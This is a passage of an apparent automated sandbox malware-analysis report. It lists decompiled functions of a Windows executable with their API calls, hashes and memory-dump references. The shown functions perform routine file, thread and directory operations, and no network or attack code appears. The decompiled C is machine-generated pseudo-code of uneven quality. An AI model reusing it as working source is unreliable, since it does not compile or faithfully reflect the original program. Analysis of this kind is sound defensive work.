                                          • Opcode Fuzzy Hash: b48e2961efca33cdc268dc06a9db708dae6e35986a8212076dca9429ba69aabe
                                          • Instruction Fuzzy Hash: CC418871600609AFCB21CF64C884BDBB7B9AF44304F0444AEF84ADB251DB39ED81CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405319, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 33%
                                          			E00405319(intOrPtr __ecx, char __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				intOrPtr* _v16;
				char _v20;
				void* _t11;
				void* _t15;
				intOrPtr _t19;
				void* _t34;

				_t34 = __eflags;
				_v8 = __edx;
				E004143C2(_t11,  &_v20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ecx);
				 *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0x10))();
				_t15 = E00404D7F(__ecx,  &_v20, _t34); // executed
				if(_t15 != 0 || _v8 != 0) {
					__eflags = _v16;
					if(__eflags == 0) {
						L8:
						_t25 = _a4;
						__eflags = _a4;
						if(_a4 != 0) {
							E0041447C(_t25,  &_v20);
						}
						goto L4;
					}
					_t19 = E0040502A( &_v20, 0, __eflags);
					__eflags = _t19;
					if(_t19 != 0) {
						goto L8;
					}
					_push(4);
					goto L3;
				} else {
					_push(9);
					_push(0);
					E00409684( &_v20);
					_push(3);
					L3:
					_pop(0);
					L4:
					_push(_v20);
					L0041C160();
					return 0;
				}
			}










                                          0x00405319
                                          0x00405326
                                          0x00405329
                                          0x00405332
                                          0x00405333
                                          0x00405334
                                          0x00405335
                                          0x00405336
                                          0x00405337
                                          0x0040533f
                                          0x00405346
                                          0x0040536b
                                          0x0040536e
                                          0x00405382
                                          0x00405382
                                          0x00405385
                                          0x00405387
                                          0x0040538d
                                          0x0040538d
                                          0x00000000
                                          0x00405387
                                          0x00405375
                                          0x0040537a
                                          0x0040537c
                                          0x00000000
                                          0x00000000
                                          0x0040537e
                                          0x00000000
                                          0x0040534d
                                          0x0040534d
                                          0x0040534f
                                          0x00405350
                                          0x00405357
                                          0x00405359
                                          0x00405359
                                          0x0040535a
                                          0x0040535a
                                          0x0040535d
                                          0x00405368
                                          0x00405368

                                          APIs
                                            • Part of subcall function 004143C2: ??2@YAPAXI@Z.MSVCRT ref: 004143CA
                                            • Part of subcall function 00404D7F: ??3@YAXPAX@Z.MSVCRT ref: 00404EF2
                                            • Part of subcall function 00404D7F: ??3@YAXPAX@Z.MSVCRT ref: 00404EFA
                                            • Part of subcall function 00404D7F: ??3@YAXPAX@Z.MSVCRT ref: 00404F02
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040535D
                                            • Part of subcall function 00409684: wvsprintfW.USER32(?,00000000,?), ref: 004096A7
                                            • Part of subcall function 00409684: GetLastError.KERNEL32 ref: 004096B8
                                            • Part of subcall function 00409684: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,009D2650), ref: 004096E0
                                            • Part of subcall function 00409684: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,009D2650), ref: 004096F5
                                            • Part of subcall function 00409684: lstrlenW.KERNEL32(?), ref: 00409708
                                            • Part of subcall function 00409684: lstrlenW.KERNEL32(?), ref: 0040970F
                                            • Part of subcall function 00409684: ??2@YAPAXI@Z.MSVCRT ref: 00409724
                                            • Part of subcall function 00409684: lstrcpyW.KERNEL32(00000000,?), ref: 0040973A
                                            • Part of subcall function 00409684: lstrcpyW.KERNEL32(-00000002,?), ref: 0040974C
                                            • Part of subcall function 00409684: ??3@YAXPAX@Z.MSVCRT ref: 00409756
                                            • Part of subcall function 00409684: LocalFree.KERNEL32(?), ref: 0040975F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
                                          • String ID:
                                          • API String ID: 3247304187-0
                                          • Opcode ID: 93f40d67aa109313e1a451737b83f3a12af517dae8df780da4187817142a4ad6
                                          • Instruction ID: d99cd7d07d450def43454dd97523081ea0e1bff39705ecaa915bff4ace688a24
                                          • Opcode Fuzzy Hash: 93f40d67aa109313e1a451737b83f3a12af517dae8df780da4187817142a4ad6
                                          • Instruction Fuzzy Hash: FA01D271604608AEEF14AAA49CC19BF7368EB10388F04447FF911371C2DAB95E048A9C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B0DD, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E0041B0DD(signed int __ecx) {
				void* _t17;
				signed int _t26;
				void* _t31;
				intOrPtr _t33;

				_t23 = __ecx;
				L0041C1F0();
				_push(__ecx);
				 *((intOrPtr*)(_t31 - 0x10)) = _t33;
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				_t26 =  *((intOrPtr*)(_t31 + 8));
				_t17 = E0041AE02(__ecx, _t26,  *((intOrPtr*)(_t31 + 0xc)),  *((intOrPtr*)(_t31 + 0x10)),  *((intOrPtr*)(_t31 + 0x14)),  *((intOrPtr*)(_t31 + 0x18))); // executed
				if( *((char*)(__ecx + 0x3c)) != 0) {
					 *((char*)(_t26 + 0x132)) = 1;
				}
				if(_t17 != 0x80004001) {
					 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
					return _t17;
				} else {
					E00418E04(_t23);
					 *((char*)( *((intOrPtr*)(_t31 + 8)) + 0x136)) = 1;
					 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
					return E0041B136;
				}
			}







                                          0x0041b0dd
                                          0x0041b0e2
                                          0x0041b0e7
                                          0x0041b0eb
                                          0x0041b0f0
                                          0x0041b100
                                          0x0041b104
                                          0x0041b10d
                                          0x0041b10f
                                          0x0041b10f
                                          0x0041b11b
                                          0x0041b13c
                                          0x0041b147
                                          0x0041b11d
                                          0x0041b11d
                                          0x0041b125
                                          0x0041b12c
                                          0x0041b135
                                          0x0041b135

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 667eae066e17802bf22880d5056c4320b86ac6ca1fb471da5ead366e8fa87735
                                          • Instruction ID: 7f33fe341473cbd1ce67957057ba73322e56dc0cdd0527969264fce869e679db
                                          • Opcode Fuzzy Hash: 667eae066e17802bf22880d5056c4320b86ac6ca1fb471da5ead366e8fa87735
                                          • Instruction Fuzzy Hash: 25F0FF32540248BFDB21CF58C986BDEBBB1EB00368F08855EF80592261C3799990CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402616, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00402616(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t13;
				signed int _t14;
				intOrPtr _t25;

				_t13 = _a8;
				if(_t13 == 0) {
					_t25 = _a4;
					if( *(_t25 + 0x20) != 0) {
						E00413F01(_t25 + 0x38);
					}
					_t14 =  *(_t25 + 0x20);
					if(_t14 != 0) {
						 *((intOrPtr*)( *_t14 + 8))(_t14);
						 *(_t25 + 0x20) =  *(_t25 + 0x20) & 0x00000000;
					}
					if( *((intOrPtr*)(_t25 + 0x18)) != 0) {
						SetFileAttributesW( *(_t25 + 0x24),  *(_t25 + 0x44)); // executed
					}
					return 0;
				}
				 *0x422728 = _t13;
				return 0x80004005;
			}






                                          0x00402616
                                          0x0040261c
                                          0x0040262b
                                          0x00402633
                                          0x0040263f
                                          0x0040263f
                                          0x00402644
                                          0x00402649
                                          0x0040264e
                                          0x00402651
                                          0x00402651
                                          0x00402659
                                          0x00402661
                                          0x00402661
                                          0x00000000
                                          0x00402669
                                          0x0040261e
                                          0x00000000

                                          APIs
                                          • SetFileAttributesW.KERNELBASE(?,?), ref: 00402661
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: a28be809fa9ab79a0897c62f78f4a26379a6b73b8bf55d8bc806f67d25aeb99a
                                          • Instruction ID: 6cf0ddfa01fcbce09b7e389e4c5c56029533664a16282a392a40bbe03859dc31
                                          • Opcode Fuzzy Hash: a28be809fa9ab79a0897c62f78f4a26379a6b73b8bf55d8bc806f67d25aeb99a
                                          • Instruction Fuzzy Hash: 23F017316046019BD721DF64C948B53B7F5FF48305F04492EE08BA66E0D7BAE886CB18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040718C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040718C(void* __ecx) {
				void* _t19;

				_t19 = __ecx;
				SetCurrentDirectoryW( *0x422794);
				if( *(_t19 + 8) != 0) {
					if(E0040712A(_t19 + 4, 0x422794) != 0) {
						E00403442( *((intOrPtr*)(_t19 + 4))); // executed
					}
				}
				 *(_t19 + 8) =  *(_t19 + 8) & 0x00000000;
				 *((short*)( *((intOrPtr*)(_t19 + 4)))) = 0;
				return 1;
			}




                                          0x00407193
                                          0x00407195
                                          0x0040719f
                                          0x004071b1
                                          0x004071b6
                                          0x004071b6
                                          0x004071bb
                                          0x004071bf
                                          0x004071c5
                                          0x004071cb

                                          APIs
                                          • SetCurrentDirectoryW.KERNEL32(?,004053CB), ref: 00407195
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CurrentDirectory
                                          • String ID:
                                          • API String ID: 1611563598-0
                                          • Opcode ID: 1b86b683d1204c80f4bc069df8611068fcd3da55cbb99587d61432dcfdc45cc9
                                          • Instruction ID: 2dc04110ffb4e7feca1f3384c1cf79cff5bfc7cba108bf25bc6aeaedd3b4d0c4
                                          • Opcode Fuzzy Hash: 1b86b683d1204c80f4bc069df8611068fcd3da55cbb99587d61432dcfdc45cc9
                                          • Instruction Fuzzy Hash: 93E0923010871087C3249B15EA45653B7A19F51704F00C43EE45A5B7E0CB78AC46CA18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413F11, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00413F11(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x422638; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}







                                          0x00413f11
                                          0x00413f14
                                          0x00413f15
                                          0x00413f1d
                                          0x00413f1f
                                          0x00413f1f
                                          0x00413f22
                                          0x00413f34
                                          0x00413f42
                                          0x00413f48

                                          APIs
                                          • WriteFile.KERNELBASE(00000008,00000000,?,00000000,00000000,00000008,?,00413F6D,00000000,?,00000000,00000000,00000000,?,004150F6,?), ref: 00413F34
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 3a43fcd7a99af802a65fe0958aaff3322480c322af35340799bb3ec2915328cf
                                          • Instruction ID: fd1ae6b77783b795d97a4e81ca98d7cd0469b694618befc36694788b860b91b1
                                          • Opcode Fuzzy Hash: 3a43fcd7a99af802a65fe0958aaff3322480c322af35340799bb3ec2915328cf
                                          • Instruction Fuzzy Hash: 2FE03275A00208FBCB00CF90C800BCE7BB9AB08314F10C028F8048A260C3799A50DF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413FD8, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00413FD8(signed int* __ecx, void* __eflags, WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
				void* _t8;
				signed int _t9;
				signed int* _t13;

				_t13 = __ecx;
				_t8 = E00413DDA(__ecx);
				if(_t8 != 0) {
					_t9 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
					 *_t13 = _t9;
					return _t9 & 0xffffff00 | _t9 != 0xffffffff;
				}
				return _t8;
			}






                                          0x00413fdc
                                          0x00413fde
                                          0x00413fe5
                                          0x00413ffa
                                          0x00414005
                                          0x00000000
                                          0x00414007
                                          0x0041400c

                                          APIs
                                            • Part of subcall function 00413DDA: CloseHandle.KERNEL32(004227B8,00000014,00413FE3,00000000,?,00414029,004227B8,80000000,00000000,00000000,00000000,0041404C,00000000,004227B8,00000003,00000080), ref: 00413DE5
                                          • CreateFileW.KERNELBASE(004227B8,0040995F,00000000,00000000,004227B8,0041405A,00000000,00000000,?,00414029,004227B8,80000000,00000000,00000000,00000000,0041404C), ref: 00413FFA
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CloseCreateFileHandle
                                          • String ID:
                                          • API String ID: 3498533004-0
                                          • Opcode ID: 5ea8ab8a2c0165d1c32804d1041ac21f8da3c3234316c2d1c2c91c72e9c780df
                                          • Instruction ID: 25576dffacfddd49299a2c5938d5f916c6c0a3737d2a1d54cb842f78843bf2a4
                                          • Opcode Fuzzy Hash: 5ea8ab8a2c0165d1c32804d1041ac21f8da3c3234316c2d1c2c91c72e9c780df
                                          • Instruction Fuzzy Hash: 47E08632100219BBCF211FA49C02BCA3F56AF18360F108116FB11561E0C772D4B0AB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040709F, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E0040709F(intOrPtr* __ecx, void* __edx, char _a4) {

				__imp___beginthreadex(0, 0, __edx, _a4, 0,  &_a4); // executed
				 *__ecx = 0;
				return E0040705A(0);
			}



                                          0x004070b2
                                          0x004070bd
                                          0x004070c6

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _beginthreadex
                                          • String ID:
                                          • API String ID: 3014514943-0
                                          • Opcode ID: 0001c2751ec5b38c2fdd8770f8b250f083c030f0baebac9fc5d5da33beea9271
                                          • Instruction ID: f66fee764f537c73dd3179b80b905b367c327d96f84bf69b71a8138a202bd0f1
                                          • Opcode Fuzzy Hash: 0001c2751ec5b38c2fdd8770f8b250f083c030f0baebac9fc5d5da33beea9271
                                          • Instruction Fuzzy Hash: B3D05EF29002087FDB00AFA4DC05CBB7A9CDA45250700853AFD48C7201E5759D5087E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041B7F3, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E0041B7F3(intOrPtr __ecx) {
				void* _t9;
				void* _t14;
				void* _t19;
				intOrPtr _t21;

				L0041C1F0();
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t19 - 0x10)) = _t21;
				 *((intOrPtr*)(_t19 - 0x14)) = __ecx;
				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
				_t9 = E0041B4D3(__ecx, _t14, 0); // executed
				 *(_t19 - 4) =  *(_t19 - 4) | 0xffffffff;
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
				return _t9;
			}







                                          0x0041b7f8
                                          0x0041b7fd
                                          0x0041b7fe
                                          0x0041b802
                                          0x0041b805
                                          0x0041b808
                                          0x0041b80e
                                          0x0041b813
                                          0x0041b81a
                                          0x0041b825

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: d1727efda0c4b3b7849c279a65210e5fbc1f0a71b716a477c678de3a4255fa1b
                                          • Instruction ID: 20a8a3e65162e8bcb76f9d772fe387cab7fb7559672222b94c1ca754f3465e33
                                          • Opcode Fuzzy Hash: d1727efda0c4b3b7849c279a65210e5fbc1f0a71b716a477c678de3a4255fa1b
                                          • Instruction Fuzzy Hash: 46E08671A40204BAD714DB89CC477DEB778EB40765F10422FB01161180D3781A008665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413EA1, Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E00413EA1(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                                          0x00413ea4
                                          0x00413ea5
                                          0x00413eb7
                                          0x00413ec5
                                          0x00413ecb

                                          APIs
                                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00413EB7
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: aaa7fc0bee448c6a2f67fcdb91d4647745e8fe0572ea30e5d88b75afb862a541
                                          • Instruction ID: 9b454950ea75836eca7fe91a31d8659671653d16dcec92d246dd104a82401603
                                          • Opcode Fuzzy Hash: aaa7fc0bee448c6a2f67fcdb91d4647745e8fe0572ea30e5d88b75afb862a541
                                          • Instruction Fuzzy Hash: E2E0EC75600208FFDB01CF90CD01FDE7BBEEB49758F208058E90496160C775DA10EB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405979, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E00405979() {
				void* _v16;
				void* __ecx;
				void* _t7;
				void* _t11;

				E00414803( &_v16);
				E00405546( &_v16, _t11);
				_t7 = E00403442(_v16); // executed
				_push(_v16);
				L0041C160();
				return _t7;
			}







                                          0x00405983
                                          0x0040598b
                                          0x00405993
                                          0x00405998
                                          0x0040599b
                                          0x004059a2

                                          APIs
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040599B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@memcpy
                                          • String ID:
                                          • API String ID: 2754646359-0
                                          • Opcode ID: fa6b549369a74d040dc17a7ece95bf0259d40384a8e767ccb493eda729ae9f6c
                                          • Instruction ID: f136c1752403047c5aa641bf50be563d9da0cd5f4cd32f6045af0963c04fef26
                                          • Opcode Fuzzy Hash: fa6b549369a74d040dc17a7ece95bf0259d40384a8e767ccb493eda729ae9f6c
                                          • Instruction Fuzzy Hash: 8DD0C731D0000877CB05B7A1EC528DE77755E4070CB50827EB022360D69F745E48CA59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00413EE4, Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00413EE4(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}




                                          0x00413ef2
                                          0x00413efa
                                          0x00413efe

                                          APIs
                                          • SetFileTime.KERNELBASE(?,?,?,?,00413F0E,00000000,00000000,?,00402644,?), ref: 00413EF2
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileTime
                                          • String ID:
                                          • API String ID: 1425588814-0
                                          • Opcode ID: 3c5d57e2c48a45a692d10b1dc98720b6952046f07c608b6af34a0fcbf2fb381c
                                          • Instruction ID: e0d35bd63a854c57eee69d76631bc9c38302ce33a3f2f21c2b12c5388e97b13e
                                          • Opcode Fuzzy Hash: 3c5d57e2c48a45a692d10b1dc98720b6952046f07c608b6af34a0fcbf2fb381c
                                          • Instruction Fuzzy Hash: FBC04C36158105FFCF020FB0CC04C1ABFA2AB99315F10C918B159C4070C7368024EB02
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C173, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _onexit
                                          • String ID:
                                          • API String ID: 572287377-0
                                          • Opcode ID: 70708c98d1dc7566571e7de0e536aad1ca2b822a7fd5c0d4cc40cf7eb4ca856a
                                          • Instruction ID: 06dc4e053ff0de979efe87a70d7ae25a0d5be0b6429467df7d2fad60ad11e5ea
                                          • Opcode Fuzzy Hash: 70708c98d1dc7566571e7de0e536aad1ca2b822a7fd5c0d4cc40cf7eb4ca856a
                                          • Instruction Fuzzy Hash: 05B01275002000FBCF022F40ED0448DBF21EB48311B20C465F05A81031C732C421BB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401303, Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E00401303(void* __ecx, void* __eflags) {
				intOrPtr* _t9;
				intOrPtr* _t10;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t23;
				void* _t25;

				_t25 = __ecx;
				_t9 = E0040115F(__ecx);
				if(_t9 == 0) {
					_push(0xc);
					L0041C16C();
					if(_t9 == 0) {
						_t23 = 0;
					} else {
						 *((intOrPtr*)(_t9 + 4)) = 0x41f7c4;
						 *((intOrPtr*)(_t9 + 8)) = 0;
						 *_t9 = 0x41d5f0;
						 *((intOrPtr*)(_t9 + 4)) = 0x41d5e0;
						_t23 = _t9;
					}
					_t4 = _t25 + 4; // 0x9d2650
					_t10 =  *_t4;
					 *((intOrPtr*)( *_t10 + 0x10))(_t10, 0, 0, 0, 0);
					_t6 = _t25 + 8; // 0x9d2680
					_t12 =  *_t6;
					_t7 = _t25 + 4; // 0x9d2650
					_t13 =  *((intOrPtr*)( *_t12 + 0xc))(_t12,  *_t7, 0x41ea98, _t23);
					asm("sbb al, al");
					return  ~_t13 + 1;
				} else {
					return 1;
				}
			}









                                          0x00401304
                                          0x00401306
                                          0x0040130d
                                          0x00401314
                                          0x00401316
                                          0x00401320
                                          0x0040133d
                                          0x00401322
                                          0x00401322
                                          0x00401329
                                          0x0040132c
                                          0x00401332
                                          0x00401339
                                          0x00401339
                                          0x0040133f
                                          0x0040133f
                                          0x00401349
                                          0x0040134c
                                          0x0040134c
                                          0x0040134f
                                          0x0040135c
                                          0x00401361
                                          0x00401367
                                          0x0040130f
                                          0x00401312
                                          0x00401312

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: 530541863fe87d91b3746bc2cb94423826a85f1004adc9c1c8b154fef11766d7
                                          • Instruction ID: a51787965d0bc3bdbe74b998de211b2743835052462f3d0f1d26fd9b701dad35
                                          • Opcode Fuzzy Hash: 530541863fe87d91b3746bc2cb94423826a85f1004adc9c1c8b154fef11766d7
                                          • Instruction Fuzzy Hash: 45F0C8B1500221AFD7189F65D80AD977B99EF85710315C46FF406CB3A1D7B4EC82C668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414EF1, Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00414EF1(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr* _a16) {
				void* _t12;
				signed int _t13;
				signed int _t15;
				intOrPtr* _t20;
				intOrPtr _t24;

				_t24 = _a4;
				_push( &_a12);
				_t12 = E00413ECE(_t24 + 0x14, _a8, _a12); // executed
				_t20 = _a16;
				if(_t20 != 0) {
